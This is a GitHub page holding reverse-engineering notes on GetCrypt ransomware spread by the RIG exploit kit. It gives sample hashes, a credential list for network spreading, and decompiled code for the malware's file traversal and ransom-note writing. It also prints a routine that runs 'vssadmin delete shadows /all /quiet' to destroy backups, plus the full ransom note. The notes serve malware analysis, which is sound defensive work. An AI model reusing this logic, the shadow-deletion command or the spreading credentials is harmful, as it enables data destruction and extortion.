Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Malware-Misc-RE/2019-05-22-rigek-gercrypt-ransomware-vk-notes.cpp
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
243 lines (231 sloc)
6.35 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| RIGEK -> GETCRYPT RANSOMWARE | |
| MD5: e8a3d9203c5c41a47f78f984aa722038 | |
| (unpacked) | |
| https://www.virustotal.com/#/file/3ee4607ed06c270fdf9ddfde65da676d2547607bad420a8114767309b17adfeb/detection | |
| h/t @nao_sec | |
| https://twitter.com/nao_sec/status/1131172350416711680 | |
| Usual Windows Crypto API with key | |
| WHITELISTED LOCATIONS: | |
| C:\Windows\System32 | |
| C:\Windows\System32\svchost.exe | |
| :\$Recycle.Bin | |
| :\ProgramData | |
| :\Users\All Users | |
| :\Program Files | |
| :\Local Settings | |
| :\Windows | |
| :\Boot | |
| :\System Volume Information | |
| :\Recovery | |
| AppData | |
| NETWORK SPREADING CREDENTIALS (WNetAddConnection2W | WNetEnumResourceW) | |
| admin | |
| administrator | |
| Administrator | |
| test | |
| 1111 | |
| 11111 | |
| 111111 | |
| Guest | |
| Home | |
| root | |
| developer | |
| r00t | |
| ro0t | |
| r0ot | |
| qwerty | |
| 1234 | |
| 12345 | |
| 123456 | |
| 1234567 | |
| 12345678 | |
| 123456789 | |
| 1234567890 | |
| */ | |
| // FILE TRAVERSAL FUNCTION | |
| int __thiscall sub_401FC0(void *this) | |
| { | |
| void *v1; // edi@1 | |
| int v2; // eax@1 | |
| int (__stdcall *v3)(int, int, int); // esi@1 | |
| int v4; // ST14_4@1 | |
| int v5; // ST18_4@1 | |
| int v6; // eax@1 | |
| int v7; // ebx@1 | |
| int v8; // ebx@2 | |
| unsigned int v9; // esi@3 | |
| const char *v10; // edi@4 | |
| int v11; // ST10_4@5 | |
| int (__cdecl *v12)(signed int, signed int); // edi@9 | |
| int v13; // eax@9 | |
| int v14; // ST14_4@9 | |
| int v15; // ST18_4@9 | |
| int v16; // eax@11 | |
| int v17; // ST14_4@11 | |
| int v18; // ST18_4@11 | |
| int result; // eax@11 | |
| int v20; // edi@11 | |
| int (__stdcall *v21)(char *, const wchar_t *); // esi@13 | |
| char v22; // al@14 | |
| unsigned int v23; // esi@17 | |
| int v24; // eax@28 | |
| int v25; // ST14_4@28 | |
| int v26; // ST18_4@28 | |
| int v27; // [sp+18h] [bp-284h]@2 | |
| void *v28; // [sp+1Ch] [bp-280h]@1 | |
| int v29; // [sp+20h] [bp-27Ch]@1 | |
| const char *v30; // [sp+24h] [bp-278h]@2 | |
| const char *v31; // [sp+28h] [bp-274h]@2 | |
| const char *v32; // [sp+2Ch] [bp-270h]@2 | |
| const char *v33; // [sp+30h] [bp-26Ch]@2 | |
| const char *v34; // [sp+34h] [bp-268h]@2 | |
| const char *v35; // [sp+38h] [bp-264h]@2 | |
| const char *v36; // [sp+3Ch] [bp-260h]@2 | |
| const char *v37; // [sp+40h] [bp-25Ch]@2 | |
| const char *v38; // [sp+44h] [bp-258h]@2 | |
| const char *v39; // [sp+48h] [bp-254h]@2 | |
| int v40; // [sp+4Ch] [bp-250h]@12 | |
| char v41; // [sp+78h] [bp-224h]@14 | |
| v1 = this; | |
| v28 = this; | |
| v2 = GetProcessHeap(8, 65598); | |
| v3 = HeapAlloc; | |
| v6 = HeapAlloc(v2, v4, v5); | |
| v7 = v6; | |
| v29 = v6; | |
| if ( v6 ) | |
| { | |
| v30 = " Attention! Your computer has been attacked by virus-encoder!\r\n"; | |
| v31 = " All your files are now encrypted using cryptographycalli strong aslgorithm.\r\n"; | |
| v32 = " Without the original key recovery is impossible.\r\n"; | |
| v33 = "\r\n"; | |
| v34 = "TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI\r\n"; | |
| v35 = "\r\n"; | |
| v36 = "It is in your interest to respond as soon as possible to ensure the restoration of your files.\r\n"; | |
| v37 = "\r\n"; | |
| v38 = "P.S only in case you do not recive a response from the first email address within 48 hours,\r\n"; | |
| v39 = "please use this alternative email address: CRYPTGET@TUTANOTA.COM\r\nYour UID:\r\n%key%\r\n"; | |
| v27 = 0; | |
| wnsprintfW(v6, 0x7FFF, (const char *)L"%s\\%s.txt", v1, L"# DECRYPT MY FILES #"); | |
| v8 = CreateFileW(v7, 0x40000000, 1, 0, 4, 128, 0); | |
| if ( v8 != -1 ) | |
| { | |
| v9 = 0; | |
| do | |
| { | |
| v10 = (&v30)[4 * v9]; | |
| if ( StrStrA((&v30)[4 * v9], "%key%") ) | |
| { | |
| WriteFile(v8, dword_406018, dword_406024, &v27, 0); | |
| } | |
| else | |
| { | |
| v11 = lstrlenA(v10); | |
| WriteFile(v8, v10, v11, &v27, 0); | |
| } | |
| ++v9; | |
| } | |
| while ( v9 < 0xA ); | |
| CloseHandle(v8); | |
| v3 = HeapAlloc; | |
| } | |
| v12 = GetProcessHeap; | |
| v13 = GetProcessHeap(0, v29); | |
| HeapFree(v13, v14, v15); | |
| } | |
| else | |
| { | |
| v12 = GetProcessHeap; | |
| } | |
| v16 = v12(8, 65598); | |
| result = v3(v16, v17, v18); | |
| v20 = result; | |
| if ( result ) | |
| { | |
| wnsprintfW(result, 0x7FFF, (const char *)L"%s\\*", v28); | |
| v27 = FindFirstFileW(v20, &v40); | |
| if ( v27 != -1 ) | |
| { | |
| v21 = (int (__stdcall *)(char *, const wchar_t *))lstrcmpW; | |
| do | |
| { | |
| wnsprintfW(v20, 0x7FFF, (const char *)L"%s\\%s", v28, &v41); | |
| v22 = v40; | |
| if ( v40 & 0x10 ) | |
| { | |
| if ( v21(&v41, L"..") && v21(&v41, L".") ) | |
| { | |
| v23 = 0; | |
| while ( !StrStrW(v20, off_4049CC[v23]) ) | |
| { | |
| ++v23; | |
| if ( v23 >= 10 ) | |
| { | |
| sub_401FC0(v20); | |
| goto LABEL_26; | |
| } | |
| } | |
| } | |
| v22 = v40; | |
| } | |
| if ( v22 & 0xA7 && !StrStrW(&v41, dword_406014) && !StrStrW(&v41, L"# DECRYPT MY FILES #") ) | |
| sub_401E40(v20); | |
| LABEL_26: | |
| v21 = (int (__stdcall *)(char *, const wchar_t *))lstrcmpW; | |
| } | |
| while ( FindNextFileW(v27, &v40) ); | |
| FindClose(v27); | |
| } | |
| v24 = GetProcessHeap(0, v20); | |
| result = HeapFree(v24, v25, v26); | |
| } | |
| return result; | |
| } | |
| // VSSADMIN | |
| int sub_401000() | |
| { | |
| int v0; // eax@1 | |
| int result; // eax@4 | |
| int v2; // [sp+0h] [bp-44h]@3 | |
| int v3; // [sp+4h] [bp-40h]@3 | |
| int v4; // [sp+8h] [bp-3Ch]@3 | |
| const wchar_t *v5; // [sp+Ch] [bp-38h]@3 | |
| const wchar_t *v6; // [sp+10h] [bp-34h]@3 | |
| const wchar_t *v7; // [sp+14h] [bp-30h]@3 | |
| const wchar_t *v8; // [sp+18h] [bp-2Ch]@3 | |
| int v9; // [sp+1Ch] [bp-28h]@3 | |
| int v10; // [sp+20h] [bp-24h]@3 | |
| int v11; // [sp+3Ch] [bp-8h]@1 | |
| int v12; // [sp+40h] [bp-4h]@1 | |
| v11 = 0; | |
| v12 = 0; | |
| v0 = GetCurrentProcess(); | |
| IsWow64Process(v0, &v12); | |
| if ( v12 ) | |
| Wow64DisableWow64FsRedirection(&v11); | |
| v2 = 60; | |
| v3 = 64; | |
| v4 = 0; | |
| v5 = L"runas"; | |
| v6 = L"vssadmin.exe"; | |
| v7 = L" delete shadows /all /quiet"; | |
| v8 = L"C:\\Windows\\System32"; | |
| v9 = 0; | |
| v10 = 0; | |
| do | |
| result = ShellExecuteExW(&v2); | |
| while ( !result ); | |
| if ( v12 ) | |
| result = Wow64RevertWow64FsRedirection(&v11); | |
| return result; | |
| } | |
| /* | |
| Attention! Your computer has been attacked by virus-encoder! | |
| All your files are now encrypted using cryptographycalli strong aslgorithm. | |
| Without the original key recovery is impossible. | |
| TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI | |
| It is in your interest to respond as soon as possible to ensure the restoration of your files. | |
| P.S only in case you do not recive a response from the first email address within 48 hours, | |
| please use this alternative email address: CRYPTGET@TUTANOTA.COM | |
| /* |